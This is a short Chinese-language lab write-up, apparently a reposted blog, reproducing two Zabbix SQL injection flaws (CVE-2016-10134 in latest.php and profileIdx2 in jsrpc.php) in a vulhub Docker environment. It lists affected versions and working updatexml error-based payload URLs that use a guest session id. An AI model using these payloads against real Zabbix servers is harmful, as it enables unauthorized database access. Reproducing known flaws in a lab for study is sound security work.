zabbix SQL注入漏洞复现

环境搭建好才发现vulhub上已经有了,这里还是使用vulhub进行漏洞复现,自己搭建环境的话需要开启guest访问权限

Zabbix SQL(latest.php) 注入漏洞(CVE-2016-10134)

启动环境

docker-compose up -d

漏洞复现

访问http://ip:8080,用账号guest(密码为空)登录游客账户
登录后,查看Cookie中的zbx_sessionid,复制后16位字符

zabbix SQL注入漏洞复现_第1张图片
图片.png

payload:zabbix/latest.php?output=ajax&sid=caeaeefde7aafed5&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
zabbix SQL注入漏洞复现_第2张图片
图片.png

Zabbix SQL(jsrpc.php) 注入漏洞

漏洞产生原因:profileIdx2 参数没有被过滤
利用条件:guest用户开启,允许访问
影响版本:2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3
payload:zabbix/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

zabbix SQL注入漏洞复现_第3张图片
图片.png

你可能感兴趣的:(zabbix SQL注入漏洞复现)